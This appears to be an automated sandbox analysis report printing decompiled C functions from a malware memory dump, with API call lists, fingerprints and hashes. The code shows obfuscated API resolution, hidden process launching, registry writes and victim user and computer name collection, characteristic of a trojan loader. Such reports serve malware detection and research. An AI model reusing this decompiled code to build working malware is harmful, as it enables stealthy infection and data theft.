                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E04638EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E0463592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E0463A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x463d260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x463d2a8; // 0x88a5a8
                                                          					_t18 = _t47 + 0x463e3e6; // 0x73797325
                                                          					_t68 = E04633C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x463d2a8; // 0x88a5a8
                                                          						_t19 = _t50 + 0x463e747; // 0x4ec8cef
                                                          						_t20 = _t50 + 0x463e0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E0463A62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E0463A62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x463d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E0463A734(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0463592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04638EBD,?,00000001,?,?,00000000,00000000), ref: 04635952
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04635974
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0463598A
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046359A0
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046359B6
                                                            • Part of subcall function 0463592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046359CC
                                                          • memset.NTDLL ref: 04638F0B
                                                            • Part of subcall function 04633C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04638F24,73797325), ref: 04633C59
                                                            • Part of subcall function 04633C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04633C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,04EC8CEF,73797325), ref: 04638F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04638F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04638FB0
                                                            • Part of subcall function 0463A62D: GetProcAddress.KERNEL32(36776F57,0463A2D4), ref: 0463A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04638F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04638F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04638F96
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: a42151b9ecac807105a3e866c105cd7ab0ca8a1f8ddf72975c4671669bc6a26a
                                                          • Instruction ID: 791866ec150442323928112cf449c50c39e7c127f8dd49225607a29a3d505884
                                                          • Opcode Fuzzy Hash: a42151b9ecac807105a3e866c105cd7ab0ca8a1f8ddf72975c4671669bc6a26a
                                                          • Instruction Fuzzy Hash: B83130B6900288BFDB11AFE4CC88DDEBBBDEB04346F004469F606A7210E735AD45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E04631BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x463d2a8; // 0x88a5a8
                                                          				_t1 = _t9 + 0x463e62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E0463173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E0463A71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E046364EF(_t34, _t41, _a8);
                                                          						E0463A734(_t41);
                                                          						_t42 = E04636467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E0463A734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E046317E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E0463A734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E0463A734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0463173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04631BD0,253D7325,00000000,00000000,7742C740,?,?,046320C2,?), ref: 046317A4
                                                            • Part of subcall function 0463173D: sprintf.NTDLL ref: 046317C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046320C2,?,04EC95B0), ref: 04631BE1
                                                          • lstrlen.KERNEL32(?,?,?,046320C2,?,04EC95B0), ref: 04631BE9
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • strcpy.NTDLL ref: 04631C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04631C0B
                                                            • Part of subcall function 046364EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04631C1A,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04636506
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04631C28
                                                            • Part of subcall function 04636467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04631C34,00000000,?,?,046320C2,?,04EC95B0), ref: 04636471
                                                            • Part of subcall function 04636467: _snprintf.NTDLL ref: 046364CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 984ac3b2df51d01697e6b02968c0e96880bf6e485d42ff29e84f513b5a64103f
                                                          • Instruction ID: bfd9914ba8e3a326d36416e04873ce140381c3e727e3431b46c9b99b3f84a2b4
                                                          • Opcode Fuzzy Hash: 984ac3b2df51d01697e6b02968c0e96880bf6e485d42ff29e84f513b5a64103f
                                                          • Instruction Fuzzy Hash: FF11067B9012E4779712B7F48C84CAE36BDCE56A5B3054019FA00A7200FE38EC0297E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 046368EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 046368FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04636911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04636979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04636988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04636993
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 358ebc06398a6090793cebae0c70477b4f307c2eaa2c9fe6e055bfca9851685c
                                                          • Instruction ID: 0b53dfa47d1ff217af8cfd69b116829c3705e5eb671371c9d71bdb363d73e41f
                                                          • Opcode Fuzzy Hash: 358ebc06398a6090793cebae0c70477b4f307c2eaa2c9fe6e055bfca9851685c
                                                          • Instruction Fuzzy Hash: EF417F32D00649BFDB11DFB8D844A9EB7BAEF88305F144425E914EB260EB71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0463592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E0463A71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x463d2a8; // 0x88a5a8
                                                          					_t1 = _t23 + 0x463e11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x463d2a8; // 0x88a5a8
                                                          					_t2 = _t26 + 0x463e769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E0463A734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x463d2a8; // 0x88a5a8
                                                          						_t5 = _t30 + 0x463e756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x463d2a8; // 0x88a5a8
                                                          							_t7 = _t33 + 0x463e40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x463d2a8; // 0x88a5a8
                                                          								_t9 = _t36 + 0x463e4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x463d2a8; // 0x88a5a8
                                                          									_t11 = _t39 + 0x463e779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E04636604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04638EBD,?,00000001,?,?,00000000,00000000), ref: 04635952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04635974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0463598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046359A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046359B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046359CC
                                                            • Part of subcall function 04636604: memset.NTDLL ref: 04636683
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 9e267a4427c9ce69794ed8b74ad9ba8fd5032854971bbf60dd25031c0c60a312
                                                          • Instruction ID: 237850b803c15ab66309dd2427ff5d5befb70552f94794874b89d73fa4994fb4
                                                          • Opcode Fuzzy Hash: 9e267a4427c9ce69794ed8b74ad9ba8fd5032854971bbf60dd25031c0c60a312
                                                          • Instruction Fuzzy Hash: D9215EB56006CAAFD710DFA9C884D56B7FCEF24346B018126E946C7351FB74E9058B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0463853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x463d33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E04639070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E04636E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E0463A734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x463d278; // 0x4ec9a98
                                                          					_t16 = _t64 + 0xc; // 0x4ec9b66
                                                          					_t65 = E04639070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d0463c0
                                                          						if(E046322F1(_t97,  *_t33, _t91, _a8,  *0x463d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x463d2a8; // 0x88a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x463ea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x463e8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E04636C38(_t69,  *0x463d334,  *0x463d338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x463d2a8; // 0x88a5a8
                                                          									_t44 = _t71 + 0x463e846; // 0x74666f53
                                                          									_t73 = E04639070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d0463c0
                                                          										E04635D7D( *_t47, _t91, _a8,  *0x463d338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d0463c0
                                                          										E04635D7D( *_t49, _t91, _t99,  *0x463d330, _a16);
                                                          										E0463A734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d0463c0
                                                          									E04635D7D( *_t40, _t91, _a8,  *0x463d338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d0463c0
                                                          									E04635D7D( *_t43, _t91, _a8,  *0x463d330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E0463A734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d0463c0
                                                          					_t81 = E04638BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d0463c0
                                                          							E046322F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E0463A734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E0463A734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E0463A749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x463d33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}
























                                                          APIs
                                                          • StrChrA.SHLWAPI(04633741,0000005F,00000000,00000000,00000104), ref: 04638572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0463859F
                                                            • Part of subcall function 04639070: lstrlen.KERNEL32(?,00000000,04EC9A98,00000000,04638808,04EC9C76,?,?,?,?,?,63699BC3,00000005,0463D00C), ref: 04639077
                                                            • Part of subcall function 04639070: mbstowcs.NTDLL ref: 046390A0
                                                            • Part of subcall function 04639070: memset.NTDLL ref: 046390B2
                                                            • Part of subcall function 04635D7D: lstrlenW.KERNEL32(?,?,?,04638708,3D0463C0,80000002,04633741,0463A513,74666F53,4D4C4B48,0463A513,?,3D0463C0,80000002,04633741,?), ref: 04635DA2
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 046385C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 1c940c14040eaab8225520bf7eba896eb931eb8b4bfd53b6d47f6d77d66c5514
                                                          • Instruction ID: c91054dfa92d927d0505fffaa54d0c333a784f4e309bd68aadbe09bdb6c5c324
                                                          • Opcode Fuzzy Hash: 1c940c14040eaab8225520bf7eba896eb931eb8b4bfd53b6d47f6d77d66c5514
                                                          • Instruction Fuzzy Hash: F4514A76100289AFEF21AF60DD40DEE77BAEB14346F104518F95157260F739ED15EB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0463A199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E0463A71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E0463A734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x4631fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}
















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04631FD2), ref: 0463A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04631FD2), ref: 0463A1C9
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04631FD2), ref: 0463A203
                                                          • GetComputerNameW.KERNEL32(04631FD2,?), ref: 0463A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04631FD2,00000000,04631FD4,00000000,00000000,?,?,04631FD2), ref: 0463A249
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 603338f9e3ea4f0249c9688f2b9e87648082e1216d91d910ecb2e915ecf3a2a2
                                                          • Instruction ID: 0b176022eaec4a491de018ae3d8f536aa9d018487ff47f97bb2b82043d40d40b
                                                          • Opcode Fuzzy Hash: 603338f9e3ea4f0249c9688f2b9e87648082e1216d91d910ecb2e915ecf3a2a2
                                                          • Instruction Fuzzy Hash: 55210A76A01248FFDB11DFE4C9848EEBBB8EF54305B1444AAE541E7244E735AB04DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04633DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E04635AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E0463A81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x463d128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}








                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,046367B8,?,?,00000000,00000000), ref: 04633E23
                                                          • ResetEvent.KERNEL32(?), ref: 04633E28
                                                          • GetLastError.KERNEL32 ref: 04633E40
                                                          • GetLastError.KERNEL32(?,?,00000102,046367B8,?,?,00000000,00000000), ref: 04633E5B
                                                            • Part of subcall function 04635AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04633E08,?,?,?,?,00000102,046367B8,?,?,00000000), ref: 04635AFD
                                                            • Part of subcall function 04635AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04633E08,?,?,?,?,00000102,046367B8,?), ref: 04635B5B
                                                            • Part of subcall function 04635AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04635B6B
                                                          • SetEvent.KERNEL32(?), ref: 04633E4E
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: a55ca2c72d46ff7881b1024e86e1d3ffa638a58dfe984feffcf5e0fc35cfd920
                                                          • Instruction ID: 33f95dfca077b21abe35689ce7c6ca61c1f2cdf5ea5ff3b3704923740cb20d96
                                                          • Opcode Fuzzy Hash: a55ca2c72d46ff7881b1024e86e1d3ffa638a58dfe984feffcf5e0fc35cfd920
